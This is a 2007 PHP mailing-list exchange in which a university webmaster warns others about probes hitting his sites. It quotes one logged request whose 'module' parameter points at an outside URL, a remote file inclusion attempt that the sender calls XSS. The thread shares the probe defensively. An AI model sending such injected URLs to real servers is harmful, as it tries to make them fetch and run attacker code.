On 10/5/07, Paul Scott <[EMAIL PROTECTED]> wrote:
>
> On Fri, 2007-10-05 at 11:29 -0400, Daniel Brown wrote:
> > Yeah, honestly I wasn't sure if it was an injection attack or if
> > those URLs were referrers in the logs.
>
> OK sorry if I wasn't 100% clear here, but the logs showed up something
> like:
>
> http://fsiu.uwc.ac.za/index.php?module=http://www.goodasgold.com/nav
>
> So basically it was an XSS attempt, but because our MVC security is
> decent, it is just more of an annoyance than anything else (it screws up
> my stats man!)
>
> What I was trying to say is that *if* you didn't know about this one
> before, now you do. They are hitting all of our sites at a rate of
> knots, so are probably doing the same elsewhere.
>
> --Paul
>
>
> All Email originating from UWC is covered by disclaimer
> http://www.uwc.ac.za/portal/uwc2006/content/mail_disclaimer/index.htm
>
>
Sounds like a Joomla exploit attempt. Either way, thanks for the
heads-up, Paul.
--
Daniel P. Brown
[office] (570-) 587-7080 Ext. 272
[mobile] (570-) 766-8107
Give a man a fish, he'll eat for a day. Then you'll find out he was
allergic and is hospitalized. See? No good deed goes unpunished....
--
PHP General Mailing List (http://www.php.net/)
To unsubscribe, visit: http://www.php.net/unsub.php
